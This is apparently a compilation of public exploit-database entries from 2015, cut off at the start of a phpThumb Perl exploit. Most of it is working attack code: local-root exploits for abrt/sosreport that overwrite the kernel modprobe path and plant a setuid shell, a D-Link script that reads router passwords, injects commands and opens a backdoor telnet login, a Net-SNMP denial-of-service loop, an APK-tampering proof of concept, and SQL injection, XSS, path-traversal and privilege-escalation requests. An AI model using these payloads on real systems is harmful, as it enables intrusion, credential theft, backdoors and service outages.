#!/usr/bin/python
# CVE-2015-5287 (?)
# abrt/sosreport RHEL 7.0/7.1 local root
# rebel 09/2015
# [user@localhost ~]$ python sosreport-rhel7.py
# crashing pid 19143
# waiting for dump directory
# dump directory: /var/tmp/abrt/ccpp-2015-11-30-19:41:13-19143
# waiting for sosreport directory
# sosreport: sosreport-localhost.localdomain-20151130194114
# waiting for tmpfiles
# tmpfiles: ['tmpurfpyY', 'tmpYnCfnQ']
# moving directory
# moving tmpfiles
# tmpurfpyY -> tmpurfpyY.old
# tmpYnCfnQ -> tmpYnCfnQ.old
# waiting for sosreport to finish (can take several minutes)........................................done
# success
# bash-4.2# id
# uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
# bash-4.2# cat /etc/redhat-release
# Red Hat Enterprise Linux Server release 7.1 (Maipo)
import os,sys,glob,time,sys,socket
# Shell script that is meant to be run as root later on: once
# /proc/sys/kernel/modprobe names it (see trigger()), the kernel's modprobe
# helper presumably executes it. It drops a setuid-root copy of /bin/sh into
# /tmp. NOTE(review): if the final cleanup in trigger() never runs, /tmp/sh is
# left behind as a world-executable setuid-root shell.
payload = "#!/bin/sh\ncp /bin/sh /tmp/sh\nchmod 6755 /tmp/sh\n"
# Fork a throwaway child, turn it into `sleep 100`, give it half a second to
# exec, then SIGSEGV (11) it so abrt's core-dump handling picks up the crash
# and creates a dump directory named after the pid (polled for below).
pid = os.fork()
if pid == 0:
    os.execl("/usr/bin/sleep","sleep","100")
time.sleep(0.5)
print "crashing pid %d" % pid
os.kill(pid,11)
print "waiting for dump directory"
def waitpath(p):
    """Block until glob pattern *p* matches at least one path; return the matches.

    Polls ``glob.glob`` every 50 ms. There is no timeout: a pattern that never
    matches blocks the caller forever.
    """
    matches = glob.glob(p)
    while not matches:
        time.sleep(0.05)
        matches = glob.glob(p)
    return matches
# abrt names the dump directory /var/tmp/abrt/ccpp-<timestamp>-<pid>; wait for it.
dumpdir = waitpath("/var/tmp/abrt/cc*%d" % pid)[0]
print "dump directory: ", dumpdir
os.chdir(dumpdir)
# Presumably abrt's sosreport step runs inside that directory: first a
# sosreport-<host>-<date> directory appears, then its tmp* scratch files.
print "waiting for sosreport directory"
sosreport = waitpath("sosreport-*")[0]
print "sosreport: ", sosreport
print "waiting for tmpfiles"
tmpfiles = waitpath("tmp*")
print "tmpfiles: ", tmpfiles
# Race: swap the real sosreport directory for one we control while the
# privileged sosreport is still running. sos_logs/sos.log and ui.log become
# symlinks to /proc/sys/kernel/modprobe, so whatever the privileged writer
# later appends to its logs lands in the modprobe sysctl instead (assuming it
# follows symlinks, which the poll loop below relies on).
# NOTE(review): the 0777 directories, the renamed original and the symlinks
# are never removed, not even on the failure/timeout paths.
print "moving directory"
os.rename(sosreport, sosreport + ".old")
os.mkdir(sosreport)
os.chmod(sosreport,0777)
os.mkdir(sosreport + "/sos_logs")
os.chmod(sosreport + "/sos_logs",0777)
os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/sos.log")
os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/ui.log")
# Replace each tmp* file with a world-writable file whose only content is the
# path of our script; presumably sosreport copies their contents into its log,
# i.e. through the symlink above into /proc/sys/kernel/modprobe.
# The file objects are left for refcounting to close (CPython-specific).
print "moving tmpfiles"
for x in tmpfiles:
    print "%s -> %s" % (x,x + ".old")
    os.rename(x, x + ".old")
    open(x, "w+").write("/tmp/hax.sh\n")
    os.chmod(x,0666)
os.chdir("/")
sys.stderr.write("waiting for sosreport to finish (can take several minutes)..")
def trigger():
    """Fire the payload once /proc/sys/kernel/modprobe names /tmp/hax.sh.

    Writes the payload script, then opens a socket for an unusual protocol
    (AF_INET/SOCK_STREAM, protocol 132) -- presumably to make the kernel
    invoke its modprobe helper, i.e. our script, as root -- and waits briefly
    for the setuid /tmp/sh to appear. On success it execs ``/tmp/sh -p``,
    which restores the modprobe path, removes /tmp/sh and hands over a uid-0
    bash. Never returns normally: either execl replaces the process or
    sys.exit(-1) is called.

    NOTE(review): on the failure path /proc/sys/kernel/modprobe is left
    pointing at /tmp/hax.sh, which presumably also breaks kernel module
    autoloading on the host until an administrator resets it.
    """
    # File object is refcount-closed (CPython only); /tmp/hax.sh is never removed.
    open("/tmp/hax.sh","w+").write(payload)
    os.chmod("/tmp/hax.sh",0755)
    # Bare except: the socket() call itself is expected to fail (protocol 132
    # need not be available); only its side effect matters.
    try: socket.socket(socket.AF_INET,socket.SOCK_STREAM,132)
    except: pass
    time.sleep(0.5)
    # Bare except: any stat failure is treated as "no setuid shell".
    try:
        os.stat("/tmp/sh")
    except:
        print "could not create suid"
        sys.exit(-1)
    print "success"
    os.execl("/tmp/sh","sh","-p","-c",'''echo /sbin/modprobe > /proc/sys/kernel/modprobe;rm -f /tmp/sh;python -c "import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');"''')
    sys.exit(-1)
# Poll for up to ten minutes (600 x 1 s) until the modprobe sysctl contains our
# path, which means the privileged sosreport has written through the symlinks
# set up above; then trigger() takes over and never returns.
for x in xrange(0,60*10):
    if "/tmp/hax" in open("/proc/sys/kernel/modprobe").read():
        print "done"
        trigger()
    time.sleep(1)
    sys.stderr.write(".")
# NOTE(review): on timeout the renamed sosreport directory, the 0777
# directories, the symlinks and the rewritten tmp* files stay in the abrt dump
# directory; nothing here undoes them.
print "timed out"
# Exploit Title: arbitrary file access kodi web interface
# Shodan dork: title:kodi
# Date: 25-11-2015
# Contact: https://twitter.com/mpronk89
# Software Link: http://kodi.tv/
# Original report: http://forum.kodi.tv/showthread.php?tid=144110&pid=2170305#pid2170305
# Version: v15
# Tested on: linux
# CVE : n/a
kodi web interface vulnerable to arbitrary file read.
example (ten encoded `..` segments; `%2f` is an encoded `/`):
http://<ip>:<port>/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
for passwd
(The issue was originally fixed in 2012, reintroduced in February 2015, and fixed again in November 2015 for v16.)
#!/usr/bin/python
# CVE-2015-5273 + CVE-2015-5287
# CENTOS 7.1/Fedora22 local root (probably works on SL and older versions too)
# abrt-hook-ccpp insecure open() usage + abrt-action-install-debuginfo insecure temp directory usage
# rebel 09/2015
# ----------------------------------------
# [user@localhost ~]$ id
# uid=1000(user) gid=1000(user) groups=1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
# [user@localhost ~]$ cat /etc/redhat-release
# CentOS Linux release 7.1.1503 (Core)
# [user@localhost ~]$ python abrt-centos-fedora.py
# -- lots of boring output, might take a while on a slow connection --
# /var/spool/abrt/abrt-hax-coredump created
# executing crashing process..
# success
# bash-4.2# id
# uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
import time,os,datetime,sys,resource,socket
# Distribution check: Fedora keeps the abrt spool under /var/tmp/abrt, CentOS/
# RHEL under /var/spool/abrt (see the path rewrite and the lstat below).
fedora = "Fedora" in open("/etc/redhat-release").read()
# Two tiny cpio archives, zlib-compressed and decoded with Python 2's "zip"
# codec (not available on Python 3). Recipe used to build them:
# mkdir dir1
# ln -s /var/spool/abrt dir1/hax
# mkdir dir2
# mkdir dir2/hax
# ln -s /proc/sys/kernel/modprobe dir2/hax/abrt-hax-coredump
# cd dir1
# find . -depth -print | cpio -o > ../cpio1
# cd ../dir2
# find . -depth -print | cpio -o > ../cpio2
cpio1 = 'x\x9c;^\xc8\xcc\xa1\xb0\xef\xff\xc2\x17\xcc/\x98\x19\x19\x18\x18>\x86\xde\xdc\xc8\x02\xa4\xf9\x192\x12+\x18\xf4\xcb\x12\x8b\xf4\x8b\x0b\xf2\xf3s\xf4\x13\x93\x8aJ\x18\x8e\x03U\xb3\xef\xfb\xeb\x08R\xcd\x04U\r\xa2\x19\x18\xf4\x80r\x0cp\xc0\x08\xa5\xb9\xc1dH\x90\xa3\xa7\x8fk\x90\xa2\xa2"\xc3(\x18d\x00\x00\x16\xb9\x1bA'.decode("zip")
cpio2 = 'x\x9c;^\xc8\xcc\x917\xfb\xff\xc2\x17\xcc/\x98\x19\x19\x18\x18>\x86\xde\xdc(\x06\xa4%\x192\x12+\xf4\x13\x93\x8aJt\x81\x0c\xdd\xe4\xfc\xa2\xd4\x94\xd2\xdc\x02\x06\xfd\x82\xa2\xfcd\xfd\xe2\xcab\xfd\xec\xd4\xa2\xbc\xd4\x1c\xfd\xdc\xfc\x14\xa0PR*\xc3q\xa0I\x19\xb3\xff:\x82Lb\x82\x9a\xc4\xc2\x00\x02@\x03\xc0\xb2+\xef@d\x99\xa1\xb2L`Y=\xa0\x1c\x03\x1c0Bin0\x19\x12\xe4\xe8\xe9\xe3\x1a\xa4\xa8\xa8\xc80\nh\x02\x00\x01\x980\x88'.decode("zip")
# Retarget the symlink inside the first archive for Fedora's spool path. Both
# strings are exactly 15 bytes, so the cpio header's size field stays valid.
if fedora:
    cpio1 = cpio1.replace("/var/spool/abrt","/var/tmp///abrt")
# Script the kernel's modprobe helper is expected to run as root once
# /proc/sys/kernel/modprobe names it: drops a setuid-root copy of /bin/sh.
# NOTE(review): /tmp/sh is only removed on the success path at the very end.
payload = "#!/bin/sh\ncp /bin/sh /tmp/sh\nchmod 6755 /tmp/sh\n"
# we use a 32 bit binary because [vsyscall] will be at the end of the coredump on 64 bit binaries
# and we can't control the contents of that region. on 32 bit binaries [stack] is at the end
# the crashing binary will just fill the stack with /tmp/hax.sh which subsequently gets written
# to /proc/sys/kernel/modprobe by /usr/libexec/abrt-hook-ccpp
# Pre-assembled 32-bit ELF (nasm source quoted further down), compressed the
# same way as the cpio blobs.
elf = 'x\x9c\xabw\xf5qcddd\x80\x01&\x06f\x06\x10/\xa4\x81\x85\xc3\x84\x01\x01L\x18\x14\x18`\xaa\xe0\xaa\x81j@x1\x90\t\xc2\xac 1\x01\x06\x06\x97F\x1b\x15\xfd\x92\xdc\x82\xd2o\x8dg\xfe\xf3\x03\xf9\xbb\xbe\x00\xb5\xec\x14\x01\xca\xee\xee\x07\xaa\xd7<\xd3\xc5\xdc\xc1\xa2\xe2\xe2\xfc\xe8{\xf3\x1b\x11\xaf\xe6_\x0c\xa5\x8fv8\x02\xc1\xff\x07\xfaP\x00\xd4\xad\x9f\x91X\xa1W\x9c\xc1\xc5\x00\x00-f"X'.decode("zip")
# most people don't have nasm installed so i preassembled it
# if you're not brave enough to run the preassembled file, here's the code :)
# NOTE(review): the source as quoted does not assemble as-is: label `l`
# (target of `jne l`) and symbol `filesize` are not defined anywhere in the
# listing. From the control flow, `l` is presumably the stack-scanning loop
# at `inc esp` (walk up until the dword "/tmp" = 0x706d742f is found), and
# `filesize equ $-$$` is presumably the missing last line. Once "/tmp" is
# found the code rounds ESP up to a page boundary and copies the message
# downwards 500 times, then jumps to 0x41414141 to force the crash.
"""
; abrt-hax.asm
; nasm -f bin -o abrt-hax abrt-hax.asm
BITS 32
org 0x08048000
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 1, 1, 1, 0 ; e_ident
times 8 db 0
dw 2 ; e_type
dw 3 ; e_machine
dd 1 ; e_version
dd _start ; e_entry
dd phdr - $$ ; e_phoff
dd 0 ; e_shoff
dd 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 1 ; e_phnum
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr: ; Elf32_Phdr
dd 1 ; p_type
dd 0 ; p_offset
dd $$ ; p_vaddr
dd $$ ; p_paddr
dd filesize ; p_filesz
dd filesize ; p_memsz
dd 5 ; p_flags
dd 0x1000 ; p_align
phdrsize equ $ - phdr
_start:
inc esp
cmp dword [esp],0x706d742f
jne l
or esp,0xfff
inc esp
mov edx,500
l3:
mov ecx,msglen
mov ebx,message
sub esp,ecx
l2:
mov al,[ebx]
mov [esp],al
inc esp
inc ebx
loop l2
sub esp,msglen
dec edx
cmp edx,0
jne l3
mov eax,0x41414141
jmp eax
message db '////////tmp/hax.sh',0x0a,0
msglen equ $-message
"""
# Take the last token of the last line of `eu-readelf -n /usr/bin/hostname`
# (presumably the GNU build-id hex of an installed binary) and record it in
# /tmp/build_ids, which the debuginfo helper started from /tmp by child() is
# presumably going to read. NOTE(review): no error handling -- if elfutils is
# not installed the output is empty and the [-1] index raises IndexError.
build_id = os.popen("eu-readelf -n /usr/bin/hostname").readlines()[-1].split()[-1]
os.chdir("/tmp")
open("build_ids","w+").write(build_id + "\n")
print build_id
def child():
    """Pre-create the debuginfo helper's temp directories, then exec the helper.

    Creates /var/tmp/abrt-tmp-debuginfo-<YYYY-mm-dd-HH:MM:SS>.<pid> for the
    current second and the next two (to absorb the delay between mkdir and
    exec), makes each world-writable and plants a symlink unpacked.cpio ->
    /var/tmp/haxfifo inside, so that the archive the helper unpacks comes
    from the FIFO this script feeds (see fifo()). Then execs
    abrt-action-install-debuginfo-to-abrt-cache -y (presumably "assume yes");
    never returns. Meant to be called in a forked child only.

    NOTE(review): the bare except swallows every error from mkdir/chmod/
    symlink, including a directory that already exists (EEXIST), so a failed
    setup is only noticed later when the lstat at module level fails.
    """
    timestamp = int(time.time())
    for i in xrange(0,3):
        try:
            t = datetime.datetime.fromtimestamp(timestamp+i)
            d = "/var/tmp/abrt-tmp-debuginfo-%s.%u" % (t.strftime("%Y-%m-%d-%H:%M:%S"), os.getpid())
            os.mkdir(d)
            os.chmod(d,0777)
            os.symlink("/var/tmp/haxfifo",d+"/unpacked.cpio")
            print "created %s" % d
        except: pass
    os.execl("/usr/libexec/abrt-action-install-debuginfo-to-abrt-cache","abrt-action-install-debuginfo-to-abrt-cache","-y")
# Create the world-writable FIFO that child() links unpacked.cpio to. The bare
# except is there to tolerate a FIFO left over from an earlier run (EEXIST),
# but it also hides EACCES/ENOENT, in which case fifo() later blocks or fails
# with a less obvious error.
try:
    os.mkfifo("/var/tmp/haxfifo")
    os.chmod("/var/tmp/haxfifo",0666)
except:
    pass
def fifo(a):
    """Serve one cpio archive to the helper through /var/tmp/haxfifo.

    The helper's unpacked.cpio is a symlink to the FIFO (see child()). The
    first open()+read() blocks until a writer has opened and closed the FIFO
    -- presumably the helper writing its own archive into what it believes is
    a fresh temp file -- and drains that data. The second open() blocks until
    a reader shows up and hands it *a*, so the archive the helper goes on to
    unpack is ours. Blocks forever if the helper never touches the FIFO; the
    file objects are left for refcounting to close (CPython only).
    """
    print "reading from fifo.."
    open("/var/tmp/haxfifo").read()
    print "done"
    print "writing to fifo.."
    open("/var/tmp/haxfifo","w+").write(a)
    print "done"
# Two rounds through the helper. Round 1 unpacks cpio1, a symlink "hax" ->
# /var/spool/abrt (or /var/tmp///abrt on Fedora), into the helper's working
# directory; round 2 unpacks cpio2, whose entry hax/abrt-hax-coredump ->
# /proc/sys/kernel/modprobe is therefore created *through* that symlink, i.e.
# inside the abrt spool. Each round: fork child() (temp dirs + exec of the
# helper), feed the FIFO, reap the child.
if os.fork() == 0: child()
print "first cpio..."
fifo(cpio1)
os.wait()
time.sleep(1)
if os.fork() == 0: child()
print "second cpio..."
fifo(cpio2)
os.wait()
time.sleep(1)
# Check that the planted symlink exists (lstat: the link itself, not the
# sysctl it points to).
if fedora:
    sym = "/var/tmp/abrt/abrt-hax-coredump"
else:
    sym = "/var/spool/abrt/abrt-hax-coredump"
try:
    os.lstat(sym)
except:
    print "could not create symlink"
    sys.exit(-1)
print "%s created" % sym
# Drop the pre-assembled 32-bit crasher and run it in a child with an
# unlimited core limit, an empty argv[0] and an empty environment (so the
# stack holds little besides what the crasher writes). Per the comment near
# the top, abrt-hook-ccpp then writes the core -- whose tail is the
# "/tmp/hax.sh" filler -- through the symlink into /proc/sys/kernel/modprobe.
# NOTE(review): if the hard RLIMIT_CORE is below infinity for this user,
# setrlimit raises and the child dies without ever crashing; the check below
# then reports the modprobe failure.
open("/tmp/abrt-hax","w+").write(elf)
os.chmod("/tmp/abrt-hax",0755)
if os.fork() == 0:
    resource.setrlimit(resource.RLIMIT_CORE,(resource.RLIM_INFINITY,resource.RLIM_INFINITY,))
    print "executing crashing process.."
    os.execle("/tmp/abrt-hax","",{})
os.wait()
time.sleep(1)
if "/tmp/hax" not in open("/proc/sys/kernel/modprobe").read():
    print "could not modify /proc/sys/kernel/modprobe"
    sys.exit(-1)
# Write the payload, then provoke the kernel into running its modprobe helper
# (presumably what the socket() for protocol 132 is for; the call itself is
# expected to fail), and look for the setuid shell the payload drops.
open("/tmp/hax.sh","w+").write(payload)
os.chmod("/tmp/hax.sh",0755)
try:
    socket.socket(socket.AF_INET,socket.SOCK_STREAM,132)
except:
    pass
time.sleep(0.5)
try:
    os.stat("/tmp/sh")
except:
    print "could not create suid"
    sys.exit(-1)
print "success"
# Hand over a uid-0 bash via the setuid shell, restoring the modprobe path and
# removing /tmp/sh and the helper's cache entry on the way.
# NOTE(review): /var/tmp/haxfifo, /tmp/abrt-hax, /tmp/hax.sh, /tmp/build_ids,
# the spool symlink and the /var/tmp/abrt-tmp-debuginfo-* directories are
# never cleaned up, and on any of the sys.exit(-1) paths above the modprobe
# sysctl may already have been overwritten and is not restored.
os.execl("/tmp/sh","sh","-p","-c",'''echo /sbin/modprobe > /proc/sys/kernel/modprobe;rm -f /tmp/sh;rm -rf /var/cache/abrt-di/hax;python -c "import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');"''')
# Vulnerability title: ntop-ng <= 2.0.151021 - Privilege Escalation
# Author: Dolev Farhi
# Contact: dolev at flaresec.com
# Vulnerable version: 2.0.151021
# Fixed version: 2.2
# Link: ntop.org
# Date 27.11.2015
# CVE-2015-8368
# Product Details:
ntopng is the next generation version of the original ntop, a network traffic probe that shows the network usage, similar to what the popular top Unix command does. ntopng is based on libpcap and it has been written in a portable way in order to virtually run on every Unix platform, MacOSX and on Windows as well.
# Vulnerability Details:
In the latest stable release of ntop-ng it is possible to escalate the privileges of a non-privileged user to the admin account by resetting the password, intercepting the request and replacing the HTTP parameters: the password-reset handler trusts the `username` parameter and the `user` cookie instead of the authenticated session.
# Vulnerability Proof of concept
1. Login with an unprivileged account
2. Change the account password and intercept the request; modify the `username=` parameter and the `user=` cookie value to the admin account name.
Example:
GET /lua/admin/password_reset.lua?csrf=XXXXXXXXXXXXXXXXXX&username=admin&old_password=12345&new_password=123456&confirm_new_password=123456 HTTP/1.1
Cookie: user=admin; session=XXXXXXXXXXXXXXXXXXXXXXXXX
3. Log in with the admin account and the password you defined in step #2.
Voila! you're an administrator.
# Exploit Title: IP.Board Persistent XSS Vulnerability
# Date: 29/10/2015
# Software Link: https://www.invisionpower.com/buy
# Software version : 4.1.4.x
# Exploit Author: Mehdi Alouache
# Contact: mehdi.alouache@etu.univ-lehavre.fr
# Category: webapps
1. Description
Any registered user can execute remote javascript code by sending a
private message to another user. The malicious JS code has to
be written in the title of the message, and the receiver must have
enabled the notifications when a new message is delivered.
Note that the code is executed as soon as the notification appears (the receiver does not even need to open their inbox).
2. Proof of Concept
Register on the forum (IP.Board) of a website as a regular user, and
send a message to any user having the message notifications
enabled. In the title field (and only here), a simple
<script>alert(1)</script> will show a dialog box to the victim.
3. Solution:
Apply the vendor's forthcoming patch; until then, the message title must be HTML-escaped wherever the notification renders it.
--
ALOUACHE Mehdi
Departement informatique
Groupe A
mehdi.alouache@hotmail.fr
mehdi.alouache@etu.univ-lehavre.fr
source: https://www.securityfocus.com/bid/63547/info
Google Android is prone to a security-bypass vulnerability.
Attackers can exploit this issue to bypass certain security restrictions to perform unauthorized actions. This may aid in further attacks.
Android 4.4 is vulnerable; other versions may also be affected.
#!/usr/bin/python
import zipfile
import struct
import sys
# usage: ./pocB.py new.apk old.apk file data
zout = zipfile.ZipFile(sys.argv[1], "w")
zin = zipfile.ZipFile(sys.argv[2], "r")
replace = sys.argv[3]
new = open(sys.argv[4], 'r').read()
fp = zout.fp
for name in zin.namelist():
old = zin.read(name)
if name != replace:
zout.writestr(name, old, zipfile.ZIP_DEFLATED)
else:
assert len(new) <= len(old)
# write header, old data, and record offset
zout.writestr(name, old, zipfile.ZIP_STORED)
offset = fp.tell()
# return to name length, set to skip old data
fp.seek(-len(old) -len(name) -4, 1)
fp.write(struct.pack('<h', len(name) + len(old)))
# after old data, write new data \0 padded
fp.seek(offset)
fp.write(new)
fp.write('\0' * (len(old) - len(new)))
zout.close()
zin.close()
source: https://www.securityfocus.com/bid/64048/info
Net-SNMP is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to crash snmpd, exhaust CPU resources or trigger an infinite loop, denying service to legitimate users.
Net-SNMP 5.7.1 is vulnerable; other versions may also be affected.
#!/bin/sh
# SNMPv1 with the "public" community: the only "credential" this needs, and
# the default read-only community on many agents.
SNMPOPTS="-v1 -c public"
# Target host (first and only argument). No usage message if it is missing.
LUCKYSNMPD=$1
SNMPWALKCMD="snmpwalk $SNMPOPTS $LUCKYSNMPD"
SNMPGETCMD="snmpget $SNMPOPTS $LUCKYSNMPD"
# Only the getnext command is actually used below; the two above are unused.
SNMPGETNEXTCMD="snmpgetnext $SNMPOPTS $LUCKYSNMPD"
# Net-SNMP enterprise subtree (enterprises.8072.2); the exact objects under
# .5 and .1.1.2 are not named here -- the advisory above only says that
# repeated getnext requests over them trigger the crash/CPU exhaustion.
TESTMIB=.1.3.6.1.4.1.8072.2
TESTTELEM=$TESTMIB.5
TESTHDD=$TESTMIB.1.1.2
# Runs forever: each iteration sends several getnext PDUs, each carrying many
# OIDs (with deliberate repeats) in one request. Stop with Ctrl-C.
while true
do
    $SNMPGETNEXTCMD $TESTTELEM.1.1.4.1 $TESTTELEM.1.1.4.2 $TESTTELEM.1.1.4.3 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.4.5 $TESTTELEM.1.1.2.3 $TESTTELEM.1.1.6.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.3.1 $TESTTELEM.1.1.1.2 $TESTTELEM.1.1.1.2 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.4.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.3.3 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.8.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.6.1 $TESTTELEM.1.1.2.1
    $SNMPGETNEXTCMD $TESTTELEM.1.1.4.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.8.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.4.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.6.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.7.1 $TESTTELEM.1.1.2.1
    for i in 1 2 3
    do
        $SNMPGETNEXTCMD $TESTTELEM.1.1.3 $TESTTELEM.1.1.2 $TESTTELEM.1.1.4 $TESTTELEM.1.1.2 $TESTHDD.4 $TESTHDD.5 $TESTHDD.7 $TESTHDD.5 $TESTHDD.2 $TESTHDD.1 $TESTHDD.4 $TESTHDD.1 $TESTHDD.7 $TESTHDD.1 $TESTHDD.8 $TESTHDD.1 $TESTHDD.14 $TESTHDD.1 $TESTHDD.13 $TESTHDD.1
    done
done
* Exploit Title: WordPress Users Ultra Plugin [Blind SQL injection]
* Discovery Date: 2015/10/19
* Public Disclosure Date: 2015/12/01
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://usersultra.com
* Software Link: https://wordpress.org/plugins/users-ultra/
* Version: 1.5.50
* Tested on: WordPress 4.3.1
* Category: webapps
Description
========================================================================
One can perform an SQL injection attack simply by exploiting the following WP ajax actions:
1. `edit_video`
2. `delete_photo`
3. `delete_gallery`
4. `delete_video`
5. `reload_photos`
6. `edit_gallery`
7. `edit_gallery_confirm`
8. `edit_photo`
9. `edit_photo_confirm`
10. `edit_video_confirm`
11. `set_as_main_photo`
12. `sort_photo_list`
13. `sort_gallery_list`
14. `reload_videos`
POST parameters that are exploitable in each action respectively:
1. `video_id`
2. `photo_id`
3. `gal_id`
4. `video_id`
5. `gal_id`
6. `gal_id`
7. `gal_id`
8. `photo_id`
9. `photo_id`
10. `video_id`
11. `photo_id`, `gal_id`
12. `order`
13. `order`
14. `video_id`
In case #7 a user can also change the gallery name, description and visibility by setting the POST parameters `gal_name`, `gal_desc` and `gal_visibility` respectively.
In case #8 `photo_id` is first cast to an integer and a query to the DB is performed. If results are returned, then for each result a new query is performed without casting `photo_id` to an integer. So if an attacker knows a valid id they can perform the attack in the second query. This is achievable because, in PHP, `(int)'1 and sleep(5)' === 1`: the cast accepts the injected string, so the first query succeeds and the unsanitized original reaches the second.
In case #9 a user can also change the photo name, description, tags and category by setting the POST parameters `photo_name`, `photo_desc`, `photo_tags` and `photo_category` respectively.
In case #10 a user can also change the video name, unique id and type by setting the POST parameters `video_name`, `video_unique_id` and `video_type` respectively.
Because the functions wpdb::get_results() and wpdb::query() are in use here, only one SQL statement can be executed per request, which the author rates as keeping the severity low. Note that a time-based blind injection such as the PoC below still allows data to be extracted one condition at a time.
In addition, all actions are privileged, so the user must have an active account on the vulnerable website in order to perform the attack.
PoC
========================================================================
Send a POST request to `http://my.vulnerable.website.com/wp-admin/admin-ajax.php` with the data `action=edit_video&video_id=1 and sleep(5)`; a response delayed by about five seconds confirms the injection.
Timeline
========================================================================
2015/10/29 - Vendor notified via email
2015/11/11 - Vendor notified via contact form in his website
2015/11/13 - Vendor notified via support forums at wordpress.org
2015/11/14 - Vendor responded and received report through email
2015/12/08 - Vendor provided new version 1.5.63 which resolves issues
Solution
========================================================================
Upgrade to version 1.5.63
source: https://www.securityfocus.com/bid/64043/info
Multiple D-Link DIR series routers are prone to a local file-disclosure vulnerability because they fail to adequately validate user-supplied input.
Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on devices running the vulnerable application. This may aid in further attacks.
#!/bin/sh
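# The listing as extracted had `";` artifacts before every pipe and several
# commands wrapped across lines, which is not valid sh; this is the same
# sequence reflowed into one command per line.
# Usage banner when no router address is given.
if [ -z "$1" ]; then
    echo "d-link DIR-300 (all), DIR-600 (all), DIR-615 (fw 4.0)"
    echo "exploited by AKAT-1, 22733db72ab3ed94b5f8a1ffcde850251fe6f466, c8e74ebd8392fda4788179f9a02bb49337638e7b"
    echo "usage: $0 [router address] [telnet port]"
    exit 0
fi
# Port the telnet daemon is started on (second argument, default 3333).
if [ -z "$2" ]; then
    TPORT=3333
else
    TPORT=$2
fi
# A second port is opened in the firewall, but nothing below listens on it.
UPORT=31337
echo "Trying $1 ..."
# Unauthenticated file disclosure: __show_info.php returns the file named by
# REQUIRE_FILE inside a <center> block. /var/etc/httpasswd holds "user:pass";
# sed strips tabs and turns the colon into a space for the cut calls below.
HTTPASSWD=`curl -sS "http://$1/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd" | grep -A1 "<center>" | tail -1 | sed -e "s/\t//g ; s/^\([^:]*\):\([^:]*\)$/\1\n \2/g"`
if [ ! -z "$HTTPASSWD" ]; then
    L=`echo $HTTPASSWD | cut -d' ' -f1`
    P=`echo $HTTPASSWD | cut -d' ' -f2`
    echo "found username: $L"
    echo "found password: $P"
    # Log in with the recovered credentials (sent unescaped, so a password
    # containing & or % would break the request). grep -v "fail" exits 0 as
    # soon as any response line lacks "fail", so this is a weak success test.
    curl -d "ACTION_POST=LOGIN&LOGIN_USER=$L&LOGIN_PASSWD=$P" -sS "http://$1/login.php" | grep -v "fail" 1>/dev/null
    if [ $? -eq 0 ]; then
        # Authenticated command injection through the exeshell parameter of
        # tools_system.xgi: punch both ports through the NAT PRE_MISC chain,
        # then start telnetd with a fixed hacked:me login. The URLs are sent
        # with literal spaces, as in the original. NOTE(review): this leaves
        # a backdoor daemon and firewall rules on the device; nothing here
        # removes them.
        curl -sS "http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/iptables -t nat -A PRE_MISC -i eth0.2 -p tcp --dport $TPORT -j ACCEPT&set/runtime/syslog/sendmail=1" 1>/dev/null
        curl -sS "http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/iptables -t nat -A PRE_MISC -i eth0.2 -p tcp --dport $UPORT -j ACCEPT&set/runtime/syslog/sendmail=1" 1>/dev/null
        curl -sS "http://$1/tools_system.xgi?random_num=2011.9.22.13.59.33&exeshell=../../../../usr/sbin/telnetd -p $TPORT -l /usr/sbin/login -u hacked:me&set/runtime/syslog/sendmail=1" 1>/dev/null
        echo "if you are lucky telnet is listening on $TPORT (hacked:me) ..."
        curl -sS "http://$1/logout.php" 1>/dev/null
    fi
fi
# Same file-disclosure bug, this time for the PPP credentials.
CHAP=`curl -sS "http://$1/model/__show_info.php?REQUIRE_FILE=/etc/ppp/chap-secrets" | grep -A1 "<center>" | sed -e "s/<center>//g"`
if [ ! -z "$CHAP" ]; then
    echo "found chap-secrets: $CHAP"
fi
echo "Bye bye."
exit 0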
source: https://www.securityfocus.com/bid/64041/info
phpThumb is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because it fails to properly validate file extensions before uploading them.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
Note: This BID was previously titled 'Joomla! Alphacontent Component 'phpThumb.php' Arbitrary File Upload Vulnerability'. The title and technical details have been changed to better reflect the underlying component affected.
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request;
# Target base URL is the first argument; print a banner and usage when missing.
# NOTE(review): Perl's sleep() takes whole seconds, so sleep(0.8) and the
# other fractional sleeps below truncate to 0 or 1 second.
$target = $ARGV[0];
if($target eq '')
{
    print "======================================================\n";
    print " DEVILSCREAM - WWW.NEWBIE-SECURITY.OR.ID \n";
